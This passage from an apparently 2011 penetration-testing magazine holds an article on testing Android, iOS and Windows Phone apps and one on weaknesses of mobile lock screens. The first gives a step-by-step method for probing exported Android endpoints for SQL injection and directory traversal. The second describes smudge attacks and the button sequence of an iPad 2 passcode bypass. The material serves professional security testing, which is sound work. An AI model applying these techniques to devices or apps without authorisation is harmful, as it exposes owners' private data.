of applications with vulnerabilities just waiting to be<br />
discovered.<br />
So just how would you perform a security test of an<br />
Android application then? To help you understand<br />
the platform I’ll give you a very quick introduction to<br />
it. Android is based on the Linux Operating System<br />
and uses its user privilege model to enforce a<br />
sandbox between different applications. To enable<br />
communication between these sandboxed applications<br />
there is a kernel function called the Binder that enables<br />
communication between an application and Inter<br />
Process Communication (IPC) endpoints that are<br />
exported by each App developer. Any code exported<br />
through IPC will always execute under the privileges of<br />
the App that exposes it not the App that calls it!<br />
Step 1 – Obtain the Android package that<br />
contains your application<br />
You will either have been provided with the package by<br />
the company you are performing a test for or you can<br />
always download and install it from the Marketplace.<br />
If the application is installed from the market place,<br />
you will be able to retrieve the application package file<br />
(APK) from the device using standard android SDK<br />
tools. If downloading and installing be sure to look at<br />
the permissions it requests as this will be crucial to<br />
understanding its attack surface (you can then check<br />
these in the AndroidManifest.xml file which we’ll discuss<br />
later). For example, if the App requests the Internet<br />
privilege you know it’s likely to talk across the network!<br />
Step 2 – Unpack and grab the Android<br />
Manifest file<br />
Once you have grabbed the package file you can unpack<br />
its contents using your favourite unzip tool. Inside you<br />
will likely find the compiled Java byte code for the<br />
application, any native libraries and most importantly the<br />
starterkit 02/2011(2)<br />
MOBILE PENTESTING<br />
AndroidManifest.xml file. It’s the manifest file that tells the<br />
package manager which permissions the application will<br />
need and also tells the Binder which IPC endpoints are<br />
going to be accessible and to whom. If you are lucky you<br />
may find vulnerabilities just by looking in this file! Keep an<br />
eye out for the debuggable and sharedUid attributes as<br />
these may indicate the first weaknesses.<br />
Step 3 – Examine the classes and any native<br />
code you have<br />
At this point it’s worth having a quick look through the<br />
other files you have in your package, these will include<br />
Java classes. Once you have converted the classes.dex<br />
file to standard java classes using a tool such as dex2jar,<br />
you can use your favourite Java decompiler to look<br />
inside. If you discover native C libraries, you may want to<br />
open them in your favourite disassembler, IDA Pro is the<br />
favourite for most of us, but be warned you will need the<br />
Advanced version if you want it to automatically handle<br />
the ARM processor it is most likely to be compiled for.<br />
At this point you may have already identified hard coded<br />
usernames, passwords or other security tokens embedded<br />
within the source or in your disassembled code. You will<br />
probably want to keep anything you discover in mind for<br />
the subsequent stages of the testing.<br />
Step 4 – Identify and test all exposed<br />
endpoints<br />
To protect an application from malicious Apps on the<br />
device it is important that the local attack surface is<br />
accurately enumerated. On the Android platform there<br />
are primarily four types of interface that will be exposed<br />
through the Android specific IPC interface and these are:<br />
• Services – These are similar to the concept of a<br />
service on other platforms and technologies, they<br />
are the workhorses of Apps and operate behind the<br />
scenes often never being directly visible to a user.<br />
• Activities – These are the visual parts of the App<br />
that a user will interact with, typically these will<br />
include menus and other controls for entering data<br />
or pressing on-screen buttons.<br />
• Broadcast Receivers – These are endpoints that<br />
other applications on the device can send data to,<br />
for example to tell the App user that a new SMS<br />
has arrived or that someone is calling the phone.<br />
• Content Providers – These are best viewed as data<br />
stores that can hold information used by the App<br />
and which store data in local SQL databases (yes,<br />
make sure you keep injection attacks in mind).<br />
With the exception of dynamically registered broadcast<br />
receivers, all of these endpoints will be defined in the<br />
Page 14 http://pentestmag.com
AndroidManifest.xml file. This central App configuration<br />
file will also allow you to trace back the<br />
endpoints to the implementing java classes.<br />
In the next step you need to find out which of these<br />
endpoints are exported and thus accessible by other<br />
applications on the device. Content providers are the<br />
only endpoints that are exported by default, unless<br />
specified otherwise using the exported attribute. For all<br />
other the default behaviour is not to be exported unless<br />
explicitly exported using the exported attribute. Watch<br />
out for any intent-filters that may be assigned to these<br />
endpoints, once an intent-filter is defined, this will export<br />
the endpoint implicitly unless the exported attributes<br />
says otherwise.<br />
You should now be able to write some code that<br />
communicates with the exported IPC endpoints. This is<br />
where you will need to compile your own App and deploy<br />
it within the emulator or your own device to see how the<br />
endpoints respond when called. As far as vulnerability<br />
hunting goes you should be looking at all the classes of<br />
bug with have seen over the years. In other technologies<br />
we have largely seen the back of bugs such as directory<br />
traversal with ../../ and unexpected termination of<br />
strings with null bytes \x00 but it seems that these have<br />
also crept back into Android Apps.<br />
Another area that is ripe for security vulnerabilities is<br />
the content providers, do you remember that I mentioned<br />
they are storing data in SQL databases and that injection<br />
attacks should be considered. Unlike the majority of<br />
databases that are run on servers and desktops the<br />
mobile versions typically have interesting functionality<br />
such as file and system operations removed. Therefore,<br />
SQL injection typically only becomes an issue if there is<br />
data within the content provider that the methods are not<br />
providing access to. Using variations on SQL injection<br />
techniques discussed over the years it is often possible<br />
to read or write data in places you weren’t intended to by<br />
the developers. Content providers are also often used<br />
to allow other applications to access files that belong to<br />
the App you are looking at, this is where you regularly<br />
find directory traversal and similar vulnerabilities. As you<br />
can see the default export behaviour of content providers<br />
combined with SQL storage and file handling makes for<br />
an explosive mixture.<br />
To perform rigorous testing of all these IPC endpoints<br />
you may need to write yourself some fuzzers or test<br />
case generators and examine the behaviour. Obviously<br />
if you have access to decompiled source it becomes<br />
much easier to spot bugs but if the App makes extensive<br />
use of native code libraries with any level of obfuscation<br />
or anti-reverse engineering built in you may find that the<br />
black box testing approach is a more efficient use of<br />
your time.<br />
starterkit 02/2011(2)<br />
Step 5 – Other Considerations<br />
You can now move on to looking at other classes of<br />
vulnerability although there unfortunately isn’t enough<br />
time to go in depth on these. The areas that you should<br />
take a look at are Unix file system permissions (yes world<br />
writable files still exist) and network communications. It<br />
is often the case that Apps communicate with external<br />
endpoints such as Web Services and either do this<br />
using cleartext HTTP or don’t check the certificate if<br />
using SSL and this is worth looking at. It’s also worth<br />
considering that vulnerabilities can exist in the web<br />
services themselves although that’s out of scope of our<br />
discussion.<br />
Unfortunately we can’t go into detail about all the<br />
classes of vulnerability that you may encounter on a<br />
security test of an Android application, we’ve looked<br />
at many and found a wide spectrum of issues from<br />
common classes of bug through to interesting logic<br />
flaws. To get you started though here is a list of the top<br />
ones that we encounter:<br />
• Unnecessary IPC endpoints that are exported<br />
• Exported content providers containing sensitive<br />
data<br />
• SQL Injection in content providers<br />
• Insecure data transmission across a network<br />
• Excessive application permissions<br />
• Hardcoded credentials<br />
• Weak or dangerous file system permissions<br />
• Directory traversal<br />
• Debuggable Apps<br />
You also have the world of memory corruption bugs<br />
in native code or the Java VM itself to look at and you<br />
can use other standard testing techniques to hunt for<br />
and exploit these types of security vulnerability.<br />
Another Approach to Android Testing<br />
The team of consultants here at MWR InfoSecurity<br />
are regularly called upon to examine the security of<br />
either a single application or an entire build of phone. In<br />
these situations the process of writing test harnesses,<br />
compiling code and deploying to the hardware or<br />
emulator can take up valuable time. We therefore<br />
looked at another approach where we built a testing<br />
toolkit that will run as an App on the phone (with minimal<br />
privileges) which you can talk to whilst the phone is<br />
tethered to a laptop.<br />
This class of tool is very different from source code<br />
analysis is as it is aimed to be a practical platform for<br />
finding vulnerabilities and performing different attacks<br />
on Android devices. The main objective of a tool like this<br />
is to be a hybrid exploitation framework and auditing<br />
Page 15 http://pentestmag.com
Figure 1. Android test platform<br />
tool that can be used for many purposes. Some features<br />
which are particularly useful are:<br />
• The ease with which a user can find relevant<br />
information about exposed application attack vectors<br />
• Command-line interaction with applications on the<br />
device in order to find vulnerabilities<br />
• The ability to write proof-of-concept exploits<br />
for vulnerabilities using a range of pre-defined<br />
commands removing the need for custom application<br />
writing in order to perform tests against a target<br />
vulnerability<br />
The advantage of this approach is that you are<br />
able to obtain wide coverage across the phone and<br />
attempt exploitation without continually rebuilding and<br />
deploying code. The toolkit we developed at MWR<br />
is called Mercury and will soon be available so that<br />
security testers everywhere can benefit from the<br />
flexibility it brings to the testing process.<br />
The tool is still under development but it has already<br />
proven itself as a viable and scalable approach to<br />
Figure 2. Commands<br />
starterkit 02/2011(2)<br />
MOBILE PENTESTING<br />
security testing on the Android platform. As a teaser<br />
here are a couple of screenshots of what you can<br />
expect.<br />
Apple iOS Testing<br />
I will offer you a warning before you start considering<br />
auditing or testing an App that has been written for<br />
iOS, you won’t get very far without a Mac to help you!<br />
That isn’t an advert for Apple, it’s a reality check that<br />
developing for iOS is pretty near impossible without<br />
a Mac and performing security testing is going to be<br />
severely limited without one. When it comes to testing<br />
iPhone, iPod or iPad Apps you will be in one of two<br />
situations, you will have source code or you won’t. I’ll<br />
start with the case that you have source code as that<br />
is much easier and even if you do have it you will likely<br />
want to use elements of the black box approach as<br />
well.<br />
On iOS your source code review will focus on the<br />
same types of things as on any other type of code, the<br />
areas that handle user controlled data, control network<br />
activity and handle security tokens of any kind. To<br />
find vulnerabilities in iOS code you will need to know<br />
Objective C and have a good grasp of the types of poor<br />
coding practice that make more traditional C or C++<br />
applications vulnerable to attack.<br />
One of the most effective methods of honing in on<br />
bugs is to gauge what type of background the developer<br />
or developers have come from. They will typically be<br />
either more experienced coders who have encountered<br />
C or C++ but use the wrong bits of their knowledge<br />
and thereby introduce memory corruption bugs or<br />
developers who are new to programming and more<br />
likely to stick to Apple objective C libraries; however,<br />
are generally less experienced in secure programming.<br />
So no matter who has written the code you have a good<br />
chance of finding security bugs!<br />
The more complex part of testing an iOS application<br />
often comes when you are looking to test an App that<br />
you haven’t been given the source for. Often this occurs<br />
when an organisation wants some assurance about<br />
the security of an application they bought from a 3rd<br />
party where they are<br />
only provided with it<br />
in its compiled format<br />
or when you just<br />
fancy taking a look at<br />
something from the App<br />
Store. In this situation,<br />
outside of playing with<br />
the application on the<br />
device and testing its<br />
advertised features,<br />
Page 16 http://pentestmag.com
you need to get stuck in at the technical level. You<br />
will be able to follow a similar pattern for the analysis<br />
as with Android except for the fact that the platform<br />
doesn’t have the concept of IPC endpoints for inter-app<br />
communication. Be warned though, reverse engineering<br />
Objective-C is not easy! You may also need to consider<br />
jailbreaking the device which you also do at your own<br />
risk.<br />
If you want to put together a toolkit you should ideally<br />
include the following things:<br />
• A Mac<br />
• Xcode and other Mac development tools,<br />
Instruments on Mac OS/X is handy to have<br />
• iPhone emulator<br />
• An iPhone, iPod Touch or iPad<br />
• IDA Pro for reverse engineering<br />
Maybe I’ll be able to give you some more detailed<br />
advice in the future but hopefully you can make a start<br />
with this!<br />
Microsoft Phone 7 Testing<br />
As mentioned at the start of this article the Phone 7<br />
platform is closed and the security model was only<br />
recently talked about publicly. If you would like to know<br />
more about the platform and how security is enforced<br />
then take a look at some of the research already<br />
conducted by Alex Plaskett of MWR InfoSecurity (http://<br />
labs.mwrinfosecurity.com/projectdetail.php?project=<br />
15). I would recommend that as the starting point for<br />
anyone who is interested in testing any aspect of the<br />
platform. On the Phone 7 platform all Apps run in very<br />
tightly confined chambers and developers are only able<br />
to use Managed code in their Apps. In addition each<br />
App runs in its own sandbox within the least privileged<br />
Figure 3. Security levels<br />
starterkit 02/2011(2)<br />
chamber (LPC) on the device as illustrated in the<br />
following diagram (Figure 3).<br />
The security levels and chambers in the Windows<br />
Phone7 security model.<br />
Therefore, if you would like to test Apps on the platform<br />
I would suggest starting by looking at the permissions<br />
that are requested by the App to determine the exact<br />
attack surface you have available to you. Additionally,<br />
you can use tools like .Net Reflector to decompile the<br />
App although be warned that you may find it obfuscated<br />
and not easy to make progress with.<br />
One thing is certain, you should keep your eyes<br />
open for developments in the testing approach for this<br />
platform as more information could be released at any<br />
time.<br />
Conclusion<br />
It may be easy to categorise mobile technology as<br />
smartphone or tablets but it’s less easy to come up<br />
with a one size fits all approach when thinking about<br />
security testing. Each platform will require you to gain<br />
knowledge about its security features before you start<br />
your testing and you will also need to build up your<br />
toolkit which may require you to go out and buy some<br />
hardware and software. There are some free tools out<br />
there that can help you but as things stand you may be<br />
forced to dig into your pockets to buy some bits of kit.<br />
There are now mobile security testing courses<br />
starting to be run at the major security conferences<br />
but my advice would be to select one carefully before<br />
handing over your hard earned cash. If you want to<br />
use the knowledge gained to enable you to perform<br />
testing yourself you had better make sure your get a<br />
good teacher as there is still an undiscovered world of<br />
security bugs out there and a checklist approach won’t<br />
enable you to catch them all. The most important advice<br />
I can offer you though is get stuck in and give mobile<br />
bug hunting a go as you are certain to see the rewards<br />
for your efforts!<br />
MARTYN RUKS<br />
Martyn Ruks is Technical Director at MWR InfoSecurity and has<br />
over 10 years experience in the information security testing<br />
and research elds. He has previously worked as a security<br />
tester and consultant across a wide range of projects that has<br />
provided him with a wealth of knowledge about how to test a<br />
variety of platforms for security vulnerabilities. Martyn is most<br />
well known for his research into IBM’s WebSphere MQ from<br />
which he created a testing methodology and toolkit for the<br />
platform. His previous research had centred around a number<br />
of the more exotic networking protocols and is now engaged<br />
on a retro research project in an attempt to nd security bugs in<br />
networks of BBC Microcomputers from the 1980’s.<br />
Page 17 http://pentestmag.com
MOBILE PENTESTING<br />
Mounting a Mobile<br />
Masquerade?<br />
The sensitivity and value of data on mobile devices increasingly<br />
suggests the need for protection via some form of point-of-entry<br />
authentication. This article examines some of the methods that<br />
that are available on current devices, and highlights some of the<br />
limitations that might be encountered when using them.<br />
It’s no exaggeration to suggest that mobile devices,<br />
and particularly smartphones, can now present highly<br />
valuable targets; not just because of their physical<br />
value but also thanks to the data that people are prone<br />
to storing on them. In addition to holding a wealth of<br />
personal data, they can increasingly provide a good level<br />
of access to company and corporate data (with things<br />
like email and contacts being chief amongst these).<br />
With such a valuable asset to be protected, this article<br />
examines the forms of protection that are available to<br />
thwart an impostor at the authentication level.<br />
Although mobile devices have offered authentication<br />
safeguards for many years, it is fair to say that many<br />
users have managed to ignore them. The reason here is<br />
often that they overlook the value and sensitivity of what<br />
they’re carrying around in data terms, and so similarly<br />
overlook the need to protect it. While the situation has<br />
improved with smartphones, there are still plenty of<br />
users whose security practices haven’t caught up with<br />
their technology usage. Indeed, if you ask an audience<br />
how many of them don’t use a PIN (or similar) to protect<br />
their mobile handset, a good number of hands normally<br />
go up. However, a fair few of the same hands also go<br />
up when asked whether their phone is holding data that<br />
they think ought to be protected.<br />
So, with users that don’t bother or don’t see the need to<br />
set a PIN, there are consequently many cases in which<br />
penetrating the device requires no more than physically<br />
starterkit 02/2011(2)<br />
acquiring it. Many users seem to assume that this is the<br />
very reason that they don’t need to worry about controlling<br />
access, because they intend to keep the device with them<br />
and consider that it is protected as a result. However,<br />
there’s significant evidence to show that mobiles are<br />
very much prone to loss and theft. For example, survey<br />
findings from CREDANT Technologies showed that,<br />
over a 12-month period, almost 4,400 smartphones and<br />
tablets were left behind in a cross-section of US airports<br />
(CREDANT. 2011. CREDANT Survey Finds Consumers<br />
Left Thousands of Laptops and Smartphones at Airports<br />
Across the United States, Press Release, 12 July 2011.<br />
http://www.credant.com/news-a-events/press-releases/<br />
238-credant-survey-finds-consumers-left-thousands-oflaptops-and-smart-phones-at-airports-across-the-unitedstates.html).<br />
Based on other survey findings, it’s then a<br />
fair bet that many of these would have been unprotected<br />
against further access.<br />
Even if a PIN is used, a 4-digit code is significantly<br />
less than we’d be encouraged to use in order to protect<br />
the same data elsewhere (e.g. on a desktop system).<br />
However, affording the same level of protection is<br />
less than straightforward. For example, while almost<br />
transparent to many users when they’re sitting at a fullsize<br />
keyboard, entering a password can prove most<br />
unfriendly when you have to tap it in one-handed on<br />
a mobile device. They keys are small and fiddly, and<br />
can be particularly awkward if you’ve used a ‘strong’<br />
Page 18 http://pentestmag.com
password and then end up having to switch character<br />
sets to get the numbers and punctuation characters to<br />
appear. As a result, the relatively lengthy interaction<br />
required to enter the password may be too much<br />
effort to go through; particularly on a device that can<br />
be repeatedly going in and out of your pocket in order<br />
to perform quick tasks. In some cases, tapping in the<br />
password could end up taking longer than the thing you<br />
want to do. As a result, striking an acceptable balance<br />
between the protection and usability is actually quite a<br />
challenge to tackle.<br />
Predictably Insecure Numbers?<br />
The most common form of authentication on mobile<br />
devices has undoubtedly been based around Personal<br />
Identification Number (PIN) codes, with interfaces similar<br />
to Figure 1 dating back to the earliest handsets. However,<br />
for many users this has proven to be an unsatisfactory<br />
approach, with some finding it inconvenient to use and<br />
some considering it insufficient protection anyway. Add<br />
to these the folks that aren’t too fussed in the first place,<br />
and we have a variety of reasons why the available<br />
mechanism might not be used.<br />
Even if they use a PIN, there’s a fair chance that<br />
people aren’t using it particularly well, thanks to the<br />
opportunity to choose obvious and weak sequences.<br />
Research findings from Daniel Amitay help to put some<br />
numbers to this, based on a study of iPhone passcodes<br />
and the choices that users made (Amitay, D. 2011.<br />
Most Common iPhone Passcodes, 13 June 2011.<br />
http://amitay.us/blog/files/most_common_iphone_<br />
passcodes.php). From almost 205,000 recorded<br />
passcodes, almost 4.5% of them were found to be the<br />
sequence 1234; so put another way, this means that<br />
there’s not much more than a one in twenty chance<br />
of picking up a phone and finding that it’s locked with<br />
this particular PIN. The findings further determined<br />
that, although 10,000 permutations were theoretically<br />
available, 15% of choices logged in the sample group<br />
were based upon just ten different PINs (including the<br />
starterkit 02/2011(2)<br />
aforementioned 1234, as well as 0000, 1111 and other<br />
guessable options). The prominence of 198x and 199x<br />
sequences in the wider set of results also enabled<br />
Amitay to infer that a fair number of the other owners<br />
were using their year of birth as their passcode.<br />
In the early days, such PIN protection was arguably<br />
commensurate with the range and volume of data being<br />
held on the devices, but over time security has not<br />
evolved as quickly as other capabilities. So, as handset<br />
storage, communication and software capabilities have<br />
rocketed, the most common enhancement to user<br />
authentication until relatively recently has simply been<br />
to allow a password instead of the PIN. With this in<br />
mind, let’s take a look at how the latest platforms are<br />
taking things forward.<br />
Advancing The Authentication Alternatives<br />
After years of very little changing with mobile device<br />
authentication, the last couple of years have seen a few<br />
departures from the norm, with the most obvious ones<br />
appearing on the Android platform. In addition to standard<br />
PINs and password options, this allows users to unlock<br />
their handset by drawing a secret pattern. The interface<br />
is depicted in Figure 2, and works by drawing a pattern to<br />
connect the dots. The pattern can be 4-9 dots in length,<br />
and can use them in a variety of combinations (although<br />
certain combinations cannot be achieved; for example, it<br />
is not possible to connect the corner dots directly to each<br />
other without selecting another one in between).<br />
A first comment from the security perspective is that,<br />
unless the user is careful when they’re entering the<br />
information, then the pattern unlock process can be<br />
very observable; far more so than similar length PIN.<br />
Figure 1. The traditional view of mobile authentication Figure 2. Android pattern unlock<br />
Page 19 http://pentestmag.com
This partly comes down to the action involved, as the<br />
drawing of the secret gives an observer a continuous<br />
action to watch rather than a series of taps (which are<br />
more difficult to keep track of if you’re trying to watch<br />
what someone else is doing). Also, if a would-be<br />
impostor actually has sight of the user’s screen, then<br />
they may be a glimpse of the overall pattern itself, as<br />
depicted in Figure 2. Although Android offers an option<br />
to make the entry of the pattern invisible, this actually<br />
becomes quite difficult for the authorized user to follow<br />
(i.e. to keep track of their position in a long pattern) and<br />
to tell if they are doing it right. The option to enable<br />
tactile feedback (by means of small vibrations) does<br />
provide some help here to an extent, but it’s still easy to<br />
make a mistake.<br />
Once an impostor gets hold of a device, then it’s<br />
sometimes possible to determine the unlock pattern from<br />
the smudges and smears that the owner’s fingers have<br />
left on the screen. In fact, my first practical encounter<br />
with the pattern unlock technique was when a one of my<br />
students had popped out of the room and left his phone on<br />
the table. One of his ‘friends’ then picked it up, looked at<br />
the screen, determined the unlock pattern … and quickly<br />
changed it to something else. Although it was all done in<br />
fun on this occasion, it was a fairly clear illustration of the<br />
vulnerability. The feasibility of such attacks has also been<br />
recognized in the research community, with academics<br />
from the University of Pennsylvania having published a<br />
detailed paper on the topic (Aviv, A.J., Gibson, K., Mossop,<br />
E., Blaze, M. and Smith, J.M. 2010. Smudge Attacks on<br />
Smartphone Touch Screens, in 4th USENIX Workshop<br />
on Offensive Technologies (WOOT’10), Washington DC,<br />
9 August 2010. http://www.usenix.org/events/woot10/<br />
tech/full_papers/Aviv.pdf).<br />
In the same way that they can choose guessable<br />
PINs, there is a risk of users having a tendency towards<br />
predictable patterns (indeed,<br />
users already do this with<br />
PINs, with Amitay’s study<br />
revealing ‘2580’ to be the third<br />
most popular choice – not an<br />
obviously memorable number<br />
until you look at the pattern it<br />
traces out on the keypad). In<br />
addition, there’s a reduced<br />
set of permutations compared<br />
to an equivalent length PIN,<br />
because each elements of<br />
the pattern are more likely to<br />
adjacent to each other (they<br />
don’t have to be, but it’s more<br />
likely to happen as a result of<br />
the way that many users will<br />
starterkit 02/2011(2)<br />
MOBILE PENTESTING<br />
draw them), and unlike the digits in PIN, the positions<br />
in the pattern cannot be repeated. Having said this, the<br />
range of valid permutations is still sufficient to ensure<br />
that users have the chance to select patterns that are<br />
far from trivial to break or predictable to guess.<br />
On the positive side, the use of a pattern helps to<br />
guard against sharing – it’s hard to describe your<br />
pattern to someone when compared to a passing on a<br />
password or PIN, and so a user would have to spend<br />
time showing someone. However, users may also find<br />
long patterns potentially more difficult to remember<br />
than a numerical sequence of equivalent length,<br />
because they don’t have the opportunity to remember<br />
the information as a meaningful string in its own right.<br />
However, it is arguable that users with better visual/task<br />
memory will find the action of recalling and recreating<br />
the pattern to be an easier proposition.<br />
In addition to the pattern lock, the latest version of<br />
Android, Ice Cream Sandwich (ICS), has taken things<br />
further with introduction of face recognition. This<br />
leverages the handset’s front-facing camera to enable<br />
the phone to unlock when it sees its owner. However, no<br />
sooner had this appeared than coverage and commentary<br />
started to suggest potential problems, such as the risk of<br />
being able to fool the mechanism by showing it a photo<br />
of the legitimate user, or difficulty of using it in low light<br />
conditions (Kaelin, L. 2011. Android’s face unlock feature<br />
could be fooled by photo, TechSpot, 21 October 2011.<br />
http://www.techspot.com/news/45953-androids-faceunlock-feature-could-be-fooled-by-photo.html).<br />
Given the<br />
right lighting, however, it operates very effectively and<br />
can certainly be accomplished more quickly and with<br />
less effort than entering a PIN or a pattern.<br />
Although faults might be leveled at each of the<br />
techniques in isolation, a key thing is that Android offers<br />
a range of options. So, from a usability perspective, the<br />
Figure 3. Variations of the iOS passcode (a) Simple (b) numeric-only and (c) full character set<br />
Page 20 http://pentestmag.com
user has an increased opportunity of finding something to<br />
suit their preference, and so (in theory at least) has less<br />
of a justification for leaving their device unprotected.<br />
By contrast to Android’s advancements, the offerings<br />
on the iOS platform currently feel a bit limited. Despite<br />
Apple actually having been granted a patent on unlocking<br />
a device based upon touchscreen gestures (Chaudhri,<br />
I., Ording, B., Anzures, F.A., Van Os, M., Lemay, S.O.,<br />
Forstall, S. and Christie, G. 2011. Unlocking a device by<br />
performing gestures on an unlock image, United States<br />
Patent 8046721, 25 October 2011), the options available<br />
in iOS 5 at the time of writing are restricted to traditional<br />
PIN and password approaches, the interfaces for which<br />
are depicted in Figure 3. The default mechanism is what<br />
iOS terms the Simple passcode, which is basically a<br />
traditional PIN, fixed to four digits in length. Notably if<br />
you switch this option off, then in addition to letting you<br />
choose more complex strings, iOS will also let you get<br />
away with a single-digit PIN (which implicitly shows that<br />
it’s not doing anything to filter out silly choices either). In<br />
<br />
terms of enabling the protection, the phone can be set<br />
<br />
to require the passcode immediately, or after 1, 5 or 15<br />
minutes after the device is switched off (with the further<br />
<br />
option to auto-lock if left switched on after 1, 2, 3, 4 or 5<br />
<br />
minutes, or set not to lock).<br />
<br />
Looking at the different screenshots in Figure 3, we<br />
<br />
can make some observations about how the interface<br />
<br />
differs according to what the user has set as their<br />
passcode. With simple passcode switched on (Figure<br />
<br />
3a), the entry screen clearly shows that four digits are<br />
required, whereas with it switched off the user does<br />
not get an indication of the number of characters being<br />
expected. It’s notable that the keys in Figure 3c are<br />
significantly smaller than those on the numeric-only<br />
keypad, and so some users may find it more difficult<br />
to enter the information, particularly if they’re trying to<br />
enter the passcode on the move. This is unfortunate,<br />
as anything that increases the chance of mistakes (and<br />
thereby the risk of being locked out after consecutive<br />
errors) is likely to reduce users’ willingness to enable it.<br />
Thus while it has the potential to offer greater security<br />
than something like Android’s pattern lock, the password<br />
approach is unlikely to be as appealing to use.<br />
Although it doesn’t exactly advertise the fact, a nice<br />
touch with iOS is that it also permits you to use a long<br />
PIN (i.e. more than the standard 4 digits) and still retain<br />
the numeric keypad rather than the full keyboard. The<br />
‘trick’ is to opt to use a password, but then proceed to set<br />
something that is entirely numeric. iOS will recognize that<br />
it’s only using digits, and then present the numeric keypad<br />
rather than the alphabetic one for subsequent entry. This<br />
is depicted in Figure 3b, where it is clear that the user has<br />
to enter a PIN, but iOS is no longer giving away any clue<br />
starterkit 02/2011(2)
of how long it’s expected to be. The result for the user is<br />
the potentially useful compromise of being able to enter<br />
a longer passcode, but without having to resort to the<br />
potentially fiddly alphabetic keyboard to do so.<br />
Let Me Through, I’m An Impostor!<br />
Having enabled a lock of some kind, there is also the<br />
question of what people can still get to without needing<br />
to be authenticated. As shown in Figures 2 and 3, it is<br />
standard practice for emergency calls to still be possible<br />
from a locked device, but this is often not the only feature.<br />
For example, the recent launch of the iPhone 4S was<br />
followed by criticism that its Siri personal assistant was<br />
still active with the phone locked (Newman, J. 2011. Siri’s<br />
Security Hole: The Passcode Is the Problem, PCWorld,<br />
20 October 2011. http://www.pcworld.com/article/242253/<br />
siris_security_hole_the_passcode_is_the_problem.html).<br />
This is actually similar to what earlier iPhone users would<br />
find with the normal ‘voice control’ feature, which (unless<br />
disabled in the settings) allowed access to the phonebook<br />
to make calls or to the music library to play tracks. The<br />
difference with Siri was that it exposed a much greater<br />
range of functionality, such as the ability to send texts and<br />
emails, while the phone was otherwise still locked. In no<br />
sense was it a security oversight, as the iOS settings offer<br />
an explicit option for whether Siri should still be accessible<br />
when the phone is locked, but criticism could be leveled for<br />
making this the default configuration. This again highlights<br />
the balancing act that’s required in terms what should be<br />
left accessible for the convenience of the owner, versus<br />
what needs to be kept off-limits for their protection. For<br />
example, regardless of Siri, the iOS lock screen still allows<br />
the camera to be used or music to be played, so you<br />
could conceivably take unwanted photos and fill up the<br />
phone’s memory, or have an uninvited nose through the<br />
user’s music collection. Of course, neither of these are<br />
necessarily major risks in the grand scheme of things, but<br />
it’s also notable that the owner doesn’t have a choice to<br />
disable the features and lock off the phone completely.<br />
In addition to potential configuration weaknesses,<br />
there are sometimes genuine implementation<br />
vulnerabilities waiting to be exploited. In fact, one such<br />
example was publicised while this very article was<br />
being written, with an iOS vulnerability that allowed<br />
the passcode to be bypassed on an iPad 2. The exploit<br />
basically involved holding down the power button until<br />
slide to power off appeared, then closing the Smart<br />
Cover, re-opening it and selecting ‘Cancel’ (9to5Mac.<br />
2011. Anyone with a Smart Cover can break into your<br />
iPad 2, 20 October 2011. http://9to5mac.com/2011/10/<br />
20/anyone-with-a-smart-cover-can-break-into-youripad-2/).<br />
Doing so appeared to unlock the device and<br />
give an impostor access to whatever was on the screen<br />
starterkit 02/2011(2)<br />
MOBILE PENTESTING<br />
before it was locked. If the user had been running<br />
an app, then the impostor could see (and to some<br />
extent interact with) whatever was left on view. So,<br />
for example, if Mail was open, an impostor could look<br />
through the messages, or perhaps merrily go looking<br />
at web history in Safari. Alternatively, if the iPad had<br />
been left on the home screen, then the impostor could<br />
browse around and see what was installed. Trying to<br />
run an app quickly revealed that nothing would actually<br />
launch, as the device was still semi-locked, but some<br />
things could still be done to compromise both the<br />
integrity and confidentiality of the device. Specifically,<br />
apps could be deleted, and the search screen could still<br />
be used, with the results list from the latter potentially<br />
giving access to a wealth of confidential tidbits including<br />
contacts, schedule entries, and messages.<br />
Conclusions<br />
It is clear from many of the observations that our<br />
opportunities to protect mobile devices have not kept<br />
pace with the ways in which we’re now able to use<br />
them. The positive news is that there are now signs<br />
of this changing, with attention being given towards<br />
point-of-entry (PoE) approaches that people may feel<br />
more inclined to use. In addition, ongoing research is<br />
considering composite, non-intrusive approaches that<br />
have the potential to provide a measure of protection<br />
beyond the PoE judgement (Furnell, S., Clarke, N. and<br />
Karatzouni, S. 2008. Beyond the PIN: Enhancing user<br />
authentication for mobile devices, Computer Fraud &<br />
Security, August 2008, pp12-17). However, the level<br />
of protection that can be achieved on some devices<br />
will still lag behind what can be done on a full desktop<br />
system, and so if really sensitive data is at stake there<br />
remains a question of whether it ought to find its way<br />
onto a mobile device in the first place.<br />
PROF. STEVEN FURNELL<br />
Prof. Steven Furnell is the head of the Centre for Security,<br />
Communications &Network Research at Plymouth University<br />
in the United Kingdom, and an Adjunct Professor with Edith<br />
Cowan University in Western Australia. His interests include<br />
security management and culture, computer crime, user<br />
authentication, and security usability. Prof. Furnell is active<br />
within three working groups of the International Federation<br />
for Information Processing (IFIP) – namely Information<br />
Security Management, Information Security Education, and<br />
Human Aspects of Information Security & Assurance. He is the<br />
author of over 210 papers in refereed international journals<br />
and conference proceedings, as well as books including<br />
Cybercrime: Vandalizing the Information Society (2001) and<br />
Computer Insecurity: Risking the System (2005). Further<br />
details can be found at www.plymouth.ac.uk/cscan.<br />
Page 22 http://pentestmag.com
WHAT IS A GOOD FUZZING TOOL?<br />
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is<br />
based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hackers<br />
and security researchers when they look for weaknesses to exploit. There are no false positives, if the anomalous<br />
data causes abnormal reaction such as a crash in the target software, then you have found a critical security flaw.<br />
In this article, we will highlight the most important requirements in a fuzzing tool and also look at the most common<br />
mistakes people make with fuzzing.<br />
PROPERTIES OF A GOOD<br />
FUZZING TOOL<br />
There are abundance of fuzzing tools available. How to distinguish<br />
a good fuzzer, what are the qualities that a fuzzing tool<br />
should have?<br />
Model-based test suites: Random fuzzing will certainly give you<br />
some results, but to really target the areas that are most at risk, the<br />
test cases need to be based on actual protocol models. This results<br />
in huge improvement in test coverage and reduction in test execution<br />
time.<br />
Easy to use: Most fuzzers are built for security experts, but in QA<br />
you cannot expect that all testers understand what buffer<br />
overflows are. Fuzzing tool must come with all the security knowhow<br />
built-in, so that testers only need the domain expertise from<br />
the target system to execute tests.<br />
Automated: Creating fuzz test cases manually is a time-consuming<br />
and difficult task. A good fuzzer will create test cases automatically.<br />
Automation is also critical when integrating fuzzing into regression<br />
testing and bug reporting frameworks.<br />
Test coverage: Better test coverage means more discovered<br />
vulnerabilities. Fuzzer coverage must be measurable in two<br />
aspects: specification coverage and anomaly coverage.<br />
